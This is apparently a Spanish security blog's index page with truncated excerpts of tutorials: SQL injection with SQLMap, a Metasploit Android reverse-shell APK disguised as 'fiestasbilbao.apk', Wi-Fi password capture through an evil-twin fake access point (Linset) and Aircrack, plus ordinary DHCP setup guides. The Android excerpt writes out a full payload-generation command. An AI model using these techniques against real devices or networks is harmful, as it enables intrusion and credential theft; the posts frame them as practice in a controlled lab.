Ir al contenido principal

Entradas

Kali Linux - II Inyección SQL con SQLMap

Según Wikipedia Inyección SQL es un método de infiltración de código intruso que se vale de una vulnerabilidad informática presente en una aplicación en el nivel de validación de las entradas para realizar operaciones sobre una base de datos... La inyección SQL esta en la cima de el delito en la red, por el valor de las bases de datos que están en la red (empresas,tiendas,banca online...) ahí se almacenan todo tipo de credenciales, desde nombres de usuario hasta números bancarios. Como sabréis, las inyecciones SQL en algunos casos se pueden realizar desde el propio navegador, inyectando caracteres en una consulta desde la pagina web hasta la base de datos,  que generen un tipo de error, esa sera la parte del código SQL vulnerable, es decir inyectaremos código SQL intruso contra ese parámetro "mal configurado" . ESTA PRACTICA FUE REALIZADA EN UN ENTORNO CONTROLADO, CON DISPOSITIVOS PROPIOS, RECORDAR QUE ACCEDER Y ROBAR INFORMACIÓN AJENA ES UN DELITO PENALIZADO Y
Entradas recientes

Kali Linux - I Reverse TCP Android LVL0 con Metasploit & SET

Como ya sabéis, metasploit es la herramienta de explotación de vulnerabilidades por excelencia, en esta ocasión vamos a "atacar" dispositivos móviles personales con sistema Android. El escenario es el siguiente, el equipo atacante (Kali Linux), un servidor FTP para que nuestras victimas puedan descargar fácilmente la App y las victimas (terminales Android). Comencemos! es esencial tener instalado metasploit, en mi caso la distribución Kali linux lo trae integrado, así que procedemos, empezamos con el payload. Crear el payload es muy sencillo, basta con  introducir esta linea en una terminal. msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=8888 R> fiestasbilbao.apk Esto indica lo siguiente, la App lleva la instrucción de iniciar una sesión meterpreter contra 192.168.1.11 por el puerto 8888, la R indica que la salida es en formato .apk, escogemos el nombre e introducimos la orden, tardará un poco, una vez finalice podremos observar nu

Wifislax 4.9 - II Conseguir acceso a redes WPA/WPA2-PSK con Linset

Buenas a todos ! esta es la segunda entrada de Wifislax, conseguir acceso a redes WPA/WPA2-PSK con una herramienta incluida en nuestra distribución para auditar redes inalámbricas: LINSET. LINSET es un script con  un objetivo claro, conseguir acceso a redes sin necesidad de diccionarios ni fuerza bruta, es un tipo de "ingeniería social" su funcionamiento es el siguiente. 1. Escanea la red. 2. Selecciona la red. 3. Busca handshake (se puede usar sin handshake) 4. Se elige una de las varias interfaces web en diferentes idiomas 5. Se monta un AP Falso imitando al original 6. Se crea un servidor DHCP sobre el AP Falso 7. Se crea un servidor DNS para redirigir todas las peticiones al Host (Equipo Atacante) 8. Se lanza el servidor web con la interfaz seleccionada (Idioma escogido en el punto 4) 9. Se lanza el mecanismo para comprobar la validez de las contraseñas que se van a introducir 10. Se desautentifica a todos los usarios de la red, esperando que se conec

Wifislax 4.9 - I Conseguir acceso a redes WiFi protegidas con WPA/WPA2-PSK AirCrack

En esta practica se ha usado la ultima versión de Wifislax la 4.9  la podéis descargar AQUÍ  , también han sido necesarios un pendrive para acceder al live CD y una Antena Alfa Network AWUS036H Para los que empezáis de cero, necesitaremos una ISO de WIfislax  un dispositivo de almacenamiento USB y ganas de probar la seguridad de nuestra red WiFi...  Comenzamos!  creamos desde un sistema Windows el live CD de Wifislax con Yumi. Ejecutamos Yumi y seleccionamos la distribución o sistema para hacerla booteable desde el pendrive, acto seguido selecionamos la ISO de Wifislax y le damos a crear, podemos escoger los parámetros, como formatear el pendrive antes de crear el arranque y demás. Para arrancar desde el un dispositivo de almacenamiento USB es necesario que nuestra placa base soporte el arranque desde USB, en mi caso con habilitarlo desde la bios y pulsar F12 en el arranque ya me permite bootear un sistema de almacenamiento USB,al arrancar el pendrive nos aparecerá el menú

Instalar Servidor DHCP en W2008 R2

Instalar Servidor DHCP en Windows 2008 R2 Tras terminar la  instalación  del Sistema vamos a Administrar el Servidor  Hacemos clic derecho sobre  Funciones  y  Agregar Función Le damos a siguiente > Funciones de Servidor > Marcamos DHCP>  Configuramos el dominio, IP(V4) y DNS > Escogemos los ambitos >Configuramos IPV6 >  Configuramos la autorizacion del servidor DHCP  y le damos a Instalar  La dirección IP cada servidor será desde 10.255.101.101 a 10.255.115.115 Puerta de enlace: 10.255.255.254 Servidores DNS: 80.58.61.250  y  80.58.61.250 Ámbitos:                de  10.255.101.220   a    10.255.101.240                de 10.255.102.220   a   10.255.102.240                de 10.255.115.220   a   10.255.115.240

Instalar servidor DHCP en Ubuntu 12.04

Para instalar el servidor dentro de Ubuntu 12.04 usaremos este comando y ejecutaremos desde la Terminal(crtl + F) sudo apt-get install isc-dhcp-server a continuación crearemos un backup de el archivo de configuracion del servidor DHCP sudo cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.seg despues de hacer el backup y procederemos a editar el contenido, colocando la siguiente configuración. # contenido básico default-lease-time 650; max-lease-time 79520; option subnet-mask 255.255.255.0; option broadcast-address 192.168.1.255; option routers 192.168.1.1; subnet 192.168.10.0 netmask 255.255.255.0 {    range 192.168.1.142 192.168.1.146; } Una vez copiado esto, procederemos a cambiar el numero de subnet, 192.168.10.0 por 192.168.1.0 y ajustaremos el rango de direcciones IP que queremos servir, en mi caso de el 192.168.1.142 al 192.168.1.46 y el servidor DHCP estará completamente terminado y listo para funcionar, en el siguiente paso podemos observar como se mira el Status d